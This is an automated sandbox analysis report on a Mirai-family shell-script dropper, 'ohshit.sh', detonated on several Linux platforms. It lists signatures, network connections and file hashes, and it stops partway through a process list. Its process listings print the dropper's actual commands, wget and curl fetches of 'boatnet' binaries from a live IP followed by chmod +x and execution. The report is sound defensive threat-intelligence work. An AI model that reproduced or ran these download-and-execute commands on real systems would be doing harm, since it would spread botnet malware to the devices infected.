Analysis Overview
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Loads a kernel module
Executes dropped EXE
UPX packed file
Modifies Watchdog functionality
Writes file to system bin folder
Enumerates running processes
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
cURL User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-31 21:05
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian9-armhf-20240611-en
Max time kernel
60s
Max time network
65s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-7Xnobv WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-7Xnobv WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
/tmp/WTF
| MD5 | d209dadd662918c0360d992f693a4c88 |
| SHA1 | ff29a4cb9d0d2a4ad7e15f7523bdc5d5d681f990 |
| SHA256 | f461632cc61eaa9bcf7deb5dba0ca986c5ea65fb366fae6d329cee5458abd07d |
| SHA512 | 809bb6cea3b997755c9464d90f6b3e18b2a007c2b55dcb85ef475e72f632f6c0ea435c9fb7567741ff5233204e958d234ca7ec8e69bfdffff1a8c1dab7c55aba |
/tmp/WTF
| MD5 | b07b623c82c30103949e473cb8f1dc5b |
| SHA1 | 605c491a89e2d0e15f1e856c4f64592d63f7343b |
| SHA256 | dc6da971003c88fdafa96d46017b5c53bc87cb3f081e0be4d1342865c85bf898 |
| SHA512 | 23cd691cfae363b1194586f46403d58e1ea609c4655fba1eb295f344bd41b94ebbe15291b229678dcd3b72a8d2bff2dabfa645eb7e7f4b1d828168ed769d17b4 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | 4de74a22ebb3b2008d93fdf898611bdb |
| SHA1 | eb8c46d817f3fca933e91e289897789122b73a54 |
| SHA256 | 728c84285231652ea1b50ed634d83ef0c6e60a78db8ce93a8ae578e21f677f7e |
| SHA512 | 2bc0a4d9610ae4f15475a3eae1b85d812cb8c5229e53f09f2e47aaf26c6963eaffae5d57b27271f2bb35979ddf358e53adcebc1df503030e9854214af1a3c944 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian9-mipsel-20240611-en
Max time kernel
60s
Max time network
63s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-ccaa101beeae40f1b359d416f45a956a-systemd-timedated.service-NPoiUQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-ccaa101beeae40f1b359d416f45a956a-systemd-timedated.service-NPoiUQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
/tmp/WTF
| MD5 | d209dadd662918c0360d992f693a4c88 |
| SHA1 | ff29a4cb9d0d2a4ad7e15f7523bdc5d5d681f990 |
| SHA256 | f461632cc61eaa9bcf7deb5dba0ca986c5ea65fb366fae6d329cee5458abd07d |
| SHA512 | 809bb6cea3b997755c9464d90f6b3e18b2a007c2b55dcb85ef475e72f632f6c0ea435c9fb7567741ff5233204e958d234ca7ec8e69bfdffff1a8c1dab7c55aba |
/tmp/WTF
| MD5 | b07b623c82c30103949e473cb8f1dc5b |
| SHA1 | 605c491a89e2d0e15f1e856c4f64592d63f7343b |
| SHA256 | dc6da971003c88fdafa96d46017b5c53bc87cb3f081e0be4d1342865c85bf898 |
| SHA512 | 23cd691cfae363b1194586f46403d58e1ea609c4655fba1eb295f344bd41b94ebbe15291b229678dcd3b72a8d2bff2dabfa645eb7e7f4b1d828168ed769d17b4 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | 664b42890b160712531140f74a6ab47f |
| SHA1 | 69e5e14ab80133b263346c98bbbc57560b9887e1 |
| SHA256 | 1dd24db0f03ba2d6914002eda04248a0561513a47f55852666540bd23c582ef6 |
| SHA512 | d35bfda654489c7615e48ceed90b659730e40da09dc67272bbe6064853b8bbe2ccfb301e95d4488262f62741ceebceac43aa98af90f789036527588b0cc531c3 |
memory/843-1-0x00400000-0x0043bfb4-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
59s
Max time network
61s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/633/status | /tmp/WTF | N/A |
| File opened for reading | /proc/629/status | /tmp/WTF | N/A |
| File opened for reading | /proc/90/status | /tmp/WTF | N/A |
| File opened for reading | /proc/101/status | /tmp/WTF | N/A |
| File opened for reading | /proc/110/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1243/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1601/status | /tmp/WTF | N/A |
| File opened for reading | /proc/646/status | /tmp/WTF | N/A |
| File opened for reading | /proc/697/status | /tmp/WTF | N/A |
| File opened for reading | /proc/94/status | /tmp/WTF | N/A |
| File opened for reading | /proc/411/status | /tmp/WTF | N/A |
| File opened for reading | /proc/697/status | /tmp/WTF | N/A |
| File opened for reading | /proc/209/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1197/status | /tmp/WTF | N/A |
| File opened for reading | /proc/987/status | /tmp/WTF | N/A |
| File opened for reading | /proc/697/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1642/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1657/status | /tmp/WTF | N/A |
| File opened for reading | /proc/405/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1669/status | /tmp/WTF | N/A |
| File opened for reading | /proc/12/status | /tmp/WTF | N/A |
| File opened for reading | /proc/119/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1451/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1586/status | /tmp/WTF | N/A |
| File opened for reading | /proc/86/status | /tmp/WTF | N/A |
| File opened for reading | /proc/82/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1077/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1091/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1199/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1586/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1159/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1638/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1091/status | /tmp/WTF | N/A |
| File opened for reading | /proc/102/status | /tmp/WTF | N/A |
| File opened for reading | /proc/871/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1147/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1077/status | /tmp/WTF | N/A |
| File opened for reading | /proc/96/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1056/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1607/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1655/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1665/status | /tmp/WTF | N/A |
| File opened for reading | /proc/13/status | /tmp/WTF | N/A |
| File opened for reading | /proc/95/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1310/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1666/status | /tmp/WTF | N/A |
| File opened for reading | /proc/4/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1647/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1652/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1662/status | /tmp/WTF | N/A |
| File opened for reading | /proc/835/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1188/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1249/status | /tmp/WTF | N/A |
| File opened for reading | /proc/98/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1641/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1243/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1635/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1652/status | /tmp/WTF | N/A |
| File opened for reading | /proc/609/status | /tmp/WTF | N/A |
| File opened for reading | /proc/224/status | /tmp/WTF | N/A |
| File opened for reading | /proc/705/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1223/status | /tmp/WTF | N/A |
| File opened for reading | /proc/7/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x WTF boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/chmod
[chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/chmod
